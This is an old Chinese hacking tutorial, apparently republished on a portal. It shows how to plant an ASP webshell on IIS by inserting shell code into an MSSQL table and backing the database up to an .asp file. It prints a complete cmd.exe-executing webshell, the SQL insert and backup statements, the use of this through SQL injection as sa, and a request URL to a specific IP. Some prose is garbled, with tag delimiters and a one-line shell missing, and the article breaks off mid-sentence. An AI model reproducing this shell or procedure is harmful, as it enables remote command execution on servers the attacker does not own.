分享
 
 
 

在MSSQL下实现Backupashell的步骤

王朝mssql·作者佚名  2008-05-19
窄屏简体版  字體: |||超大  

最早想到利用数据库系统来写文件大约是在看到MySQL相关文章的时候,我记得有篇经典的贴子是讲利用TCP反弹结合输入法漏洞入侵的,第一步,也是很重要的一步就是利用了MySQL导出表到文件获得了一个web上的shell。回过头来我想,ACCESS功能不那么强大,有注入漏洞的时候也不能直接获得执行任何命令的权限,就不去看了(事实上还是可以……);MSSQL倒是有很多人详细研究过,执行命令的方法罗列了很多,可是没有了exec的权限,所做的还是有限。很多人就在问,MSSQL下面能不能导出一张表到文件,就像MySQL那样子,至少先获得一个低权限的shell来看看,我找来找去也没有找到导出表的命令,只好退而求其次――不能导出表,那就只好导出数据库了。

在说明做法前,还是先来看看为什么可以。IIS在通过asp.dll处理.asp扩展名文件的时候,对以外的内容,不做任何处理就直接输出,比如拷贝一个.exe文件到web发布目录,改扩展名为.asp后在IE中请求,返回来的结果是多半是.exe文件的内容,而不会是一个500服务器内部错误。而对于括起来的内容,默认情况下是按照VBScripts的方式解释执行后给出结果,如果在里面的内容有语法错误,才会出现常见的500服务器内部错误。换句话说,如果有一个以.asp为扩展名的文件,只要能精心控制所有的中的内容,我们就能够让它正确的执行,而至于以外的东西,asp.dll不去处理它,我们也不去关心。(这个有点像我朋友在做的预处理,外的就像是注释,里面的东西才被解释执行然后返回结果)

再来看看在MSSQL下使用backup database的情况。随便导出一个数据库看看,比如model,当然了,可以在查询分析器中做:

backup database model to disk='c:\a.txt'

用文本的方式打开这个文件,查找是否存在,呵呵,显然是没有的吧。通过上面的分析,我们知道,如果把这个文件改扩展名为.asp后,请求时不会出现问题,也就是说我们的请求会返回文本方式的内容。默认的导出文件不会导致解释执行时的错误,这是很关键的一步。下面我们要让他变为一个shell,方法自然是做一个表进去,表的内容在备份的时候一定会被存储到备份文件中去的,我们可以控制表的内容,自然也可以控制备份文件的内容。

到这里可能有人已经想一股脑儿把经典的asp shell的内容写入新建的表然后backup database了,嗯,还没有那么简单,你这样做了的话,如果还想继续我们的实验,那可能要花上重装MSSQL的代价。对于文本类型等的数据,比如text,nvchar等,在数据库中可能的形式是“abc”,但是在导出文件中,已经变成了宽字符的形式,成了“a b c ”,这样子的话,即使你好心写的是一个“,这样子,我们才能完全的控制内的内容,保证能够得到一个正确无误的asp shell。

OK,终于到了实践的部分了。通过上面的分析,应该知道利用backup database来做一个shell是完全可行的,我们先来改写一下那个利用FSO的asp shell,使其能够符合我们的要求:

<% Dim oScript %>

<% Dim oScriptNet%>

<% Dim oFileSys, oFile%>

<% Dim szCMD, szTempFile%>

<% Set oScript = Server.CreateObject("WSCRIPT.SHELL")%>

<% Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")%>

<% Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")%>

<% szCMD = Request.Form(".CMD")%>

<% If (szCMD <> "") Then%>

<% szTempFile = "C:\" & oFileSys.GetTempName()%>

<% Call oScript.Run ("cmd.exe /c " & szCMD & "

> " & szTempFile, 0, True)%>

<% Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)%>

<% End If %>

<HTML><BODY><FORM action="<%= Request.ServerVariables("URL")

%>" method="POST">

<input type=text name=".CMD" size=45 value="<%= szCMD

%>"><input type=submit value="Run"></FORM><PRE>

<% If (IsObject(oFile)) Then%>

<% On Error Resume Next%>

<% Response.Write Server.HTMLEncode(oFile.ReadAll)%>

<% oFile.Close%>

<% Call oFileSys.DeleteFile(szTempFile, True)%>

<% End If%>

</BODY></HTML>

然后打开查询分析器,依次输入以下的SQL查询语句。这些语句的大意就是创建一张表,里面有一个二进制image类型的列,然后把我们上面改写的那个shell作为内容输进去,最后导出整个数据库到一个.asp文件,开始!

use model

create table cmd (str image);

insert into cmd(str) values ('<% Dim oScript %>');

insert into cmd(str) values ('<% Dim oScriptNet%>');

insert into cmd(str) values ('<% Dim oFileSys, oFile%>');

insert into cmd(str) values ('<% Dim szCMD, szTempFile%>');

insert into cmd(str) values ('<% Set oScript = Server.CreateObject("WSCRIPT.SHELL")%>');

insert into cmd(str) values ('<% Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")%>');

insert into cmd(str) values ('<% Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")%>');

insert into cmd(str) values ('<% szCMD = Request.Form(".CMD")%>');

insert into cmd(str) values ('<% If (szCMD <> "") Then%>');

insert into cmd(str) values ('<% szTempFile = "C:\" & oFileSys.GetTempName()%>');

insert into cmd(str) values ('<% Call oScript.Run ("cmd.exe /c "

& szCMD & " > " & szTempFile, 0, True)%>');

insert into cmd(str) values ('<% Set oFile = oFileSys.OpenTextFile (szTempFile,

1, False, 0)%>');

insert into cmd(str) values ('<% End If %>');

insert into cmd(str) values ('<HTML><BODY><FORM action="<%=

Request.ServerVariables("URL") %>" method="POST">');

insert into cmd(str) values ('<input type=text name=".CMD"

size=45 value="<%= szCMD %>"><input type=submit value="Run"></FORM><PRE>');

insert into cmd(str) values ('<% If (IsObject(oFile)) Then%>');

insert into cmd(str) values ('<% On Error Resume Next%>');

insert into cmd(str) values ('<% Response.Write Server.HTMLEncode(oFile.ReadAll)%>');

insert into cmd(str) values ('<% oFile.Close%>');

insert into cmd(str) values ('<% Call oFileSys.DeleteFile(szTempFile,

True)%>');

insert into cmd(str) values ('<% End If%>');

insert into cmd(str) values ('</BODY></HTML>');

backup database model to disk='c:\l.asp';

拷贝c:\l.asp到你的web发布目录,再用浏览器请求一下,没有500错误的话,你已经获得一个shell了,不过这个shell中垃圾数据实在是太多,你要多按几下TAB键才能到输入命令的那个输入框。

实践中用FSO的webshell是很不方便的,另外一个可能的webshell是这样子:

为了造型上的美观,可以做一下适当的修改,不过从形式上来说,这东西应该是最短的。注入时候相应的做一点改动:

use model

create table cmd (str image);

insert into cmd(str) values ('');

backup database model to disk='g:\wwwtest\l.asp';

请求的时候,像这样子用:

http://202.119.9.42/l.asp?c=dir

是不是方便一些?

末了再说说可能出现的问题,一般来说随意选择一个数据库导出,默认情况下里面是不含有的,但也不排除有这种可能,尽管几率很小,但是我就遇到过一次。如果以前没有动过model,导出的文件肯定是符合要求的,但是如果你中途如果写错了些东西,比如创建了一个表,内容有出现的话,这个数据库就再也不能用了,因为也许是为了事务回滚或者是效率上的需要,即使你删除了这张表,在导出的文件中依然保存有这张表的原始内容,所以,千万要一次成功,错了要换一个database。

当然上面只是在查询分析器中的实验,实际情况下,如果你能以sa的身份注入,当然是比较轻松的,只是猜测web的物理路径的时候可能会稍微有一

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
推荐阅读
 
 
 
>>返回首頁<<
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有